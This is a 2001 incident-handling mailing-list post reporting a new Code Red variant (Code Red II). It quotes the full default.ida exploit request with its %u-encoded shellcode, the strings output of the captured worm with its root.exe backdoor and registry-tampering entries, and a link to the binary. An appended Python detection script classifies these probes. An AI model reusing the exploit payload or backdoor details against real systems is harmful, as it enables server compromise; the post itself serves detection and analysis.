new variant?

From: Stephen Friedl (friedlat_private)
Date: Sat Aug 04 2001 - 08:34:49 PDT

    Hello all,
    
    I'm sorry if this is old news, but is there a new variant going around?
    My logs just started showing entries with the signature
    
    	/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...
    
    instead of the 
    
    	/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...
    
    that we've been used to. I know there is a CRv2, but I cannot find any
    references to a different signature. I've captured the entire request,
    and though the % code is all the same, the payload is different. This
    is the "strings" output on the binary:
    
    ----------------------------------------------------------------------
    GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
    Content-type: text/xml
    Content-length: 3379 
    CodeRedII
    F4)E
    Th~f
    Th~f
    ;MZu
    KERNu
    EL32u
    GetPu
    rocAu
    D$$dg
    LoadLibraryA
    CreateThread
    GetTickCount
    Sleep
    GetSystemDefaultLangID
    GetSystemDirectoryA
    CopyFileA
    GlobalFindAtomA
    GlobalAddAtomA
    CloseHandle
    _lcreat
    _lwrite
    _lclose
    GetSystemTime
    WS2_32.DLL
    socket
    closesocket
    ioctlsocket
    connect
    select
    send
    recv
    gethostname
    gethostbyname
    WSAGetLastError
    USER32.DLL
    ExitWindowsEx
    \CMD.EXE
    d:\inetpub\scripts\root.exe
    d:\progra~1\common~1\system\MSADC\root.exe
    hT @
    hH @
    hX @
    t6Ff
    %`0@
    %d0@
    %h0@
    %p0@
    %t0@
    %x0@
    %|0@
    \EXPLORER.EXE
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    SFCDisable
    SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
    /Scripts
    /MSADC
    c:\,,217
    d:\,,217
    KERNEL32.dll
    ADVAPI32.dll
    Sleep
    GetWindowsDirectoryA
    WinExec
    RegQueryValueExA
    RegSetValueExA
    RegOpenKeyExA
    RegCloseKey
    d:\explorer.exe
    8>u'j 
    ----------------------------------------------------------------------
    
    The 3818 byte capture file is on my web server if anybody wants to poke around:
    
    	http://www.unixwiz.net/misc/codered.bin
    
    Thanks to dwmorris at DSLReports.com for the heads-up on this.
    
    Steve
    
    --- 
    Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
    www.unixwiz.net  | I speak for me only |   KA8CMY   | steveat_private
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
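The two signatures Steve contrasts above (`/default.ida?NNNN...` for the worm everyone had been seeing, `/default.ida?XXXX...` for the new one whose payload carries the string "CodeRedII") differ only in the filler character, so telling them apart in a log is a matter of finding the `default.ida` probe, reading the filler run, and then decoding the `%uXXXX` tail that follows it. The script below is an added example and is not part of Steve's post, of the capture he links, or of any SecurityFocus tooling. It assumes a raw request line of the shape quoted in the post and a W3C-style IIS log line; both sample inputs are constructed for the example, and the 224-character filler run in them is an arbitrary length chosen here, not a figure taken from the post. The `%u` escapes are decoded as one 16-bit unit each and written out little-endian, as an x86 host stores them, so the familiar `%u9090%u6858%ucbd3%u7801` prefix comes out as the bytes `90 90 58 68 d3 cb 01 78`.

```python
import re
from typing import Optional

# Constructed sample input (not from the original post): one raw request
# line of the shape the post quotes, and one W3C-style IIS log line
# (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status). The
# 224-character filler run is an arbitrary length chosen for this example.
CRII_REQUEST = ("GET /default.ida?" + "X" * 224 +
                "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
                "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3"
                "%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0")
CR_LOG_LINE = ("2001-08-04 08:34:49 192.0.2.10 GET /default.ida " + "N" * 224 +
               "%u9090%u6858%ucbd3%u7801 200")

# The probe: /default.ida, then either '?' (raw request) or whitespace
# (W3C log, where the query is its own field), then a run of one filler
# character. The backreference keeps the run to a single repeated char.
PROBE_RE = re.compile(r"/default\.ida[?\s]+(?P<filler>[NX])(?P=filler)*")
# Only well-formed %uXXXX escapes; the truncated trailing "%u00" in the
# quoted request is deliberately not matched.
PCT_U_RE = re.compile(r"%u([0-9a-fA-F]{4})")

VARIANT_BY_FILLER = {
    "N": "Code Red (N filler, the earlier worm)",
    "X": "Code Red II (X filler; payload string CodeRedII)",
}


def decode_percent_u(text: str) -> bytes:
    """Decode every well-formed %uXXXX escape in text into bytes.

    Each escape is one 16-bit unit; it is emitted little-endian, which is
    how an x86 IIS host lays the unit out in memory.
    """
    out = bytearray()
    for hexword in PCT_U_RE.findall(text):
        out += int(hexword, 16).to_bytes(2, "little")
    return bytes(out)


def classify_probe(line: str) -> Optional[dict]:
    """Classify one log or request line as a Code Red family probe.

    Returns None when the line is not a default.ida probe; otherwise a
    dict with the variant label, the filler character, the length of the
    filler run, and the first eight decoded bytes of the %u tail as hex.
    """
    m = PROBE_RE.search(line)
    if m is None:
        return None
    filler = m.group("filler")
    run_len = m.end() - m.start("filler")
    rest = line[m.end():].split()
    tail = rest[0] if rest else ""
    return {
        "variant": VARIANT_BY_FILLER[filler],
        "filler": filler,
        "filler_len": run_len,
        "decoded_prefix": decode_percent_u(tail)[:8].hex(),
    }


if __name__ == "__main__":
    for sample in (CRII_REQUEST, CR_LOG_LINE, "GET /index.html HTTP/1.0"):
        print(classify_probe(sample))
```

Run against a real IIS log, the useful columns are the filler character and the run length: a probe that matches the pattern but with a different filler or tail is exactly the kind of thing worth capturing in full, as Steve did, rather than assuming it is one of the two known variants.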
    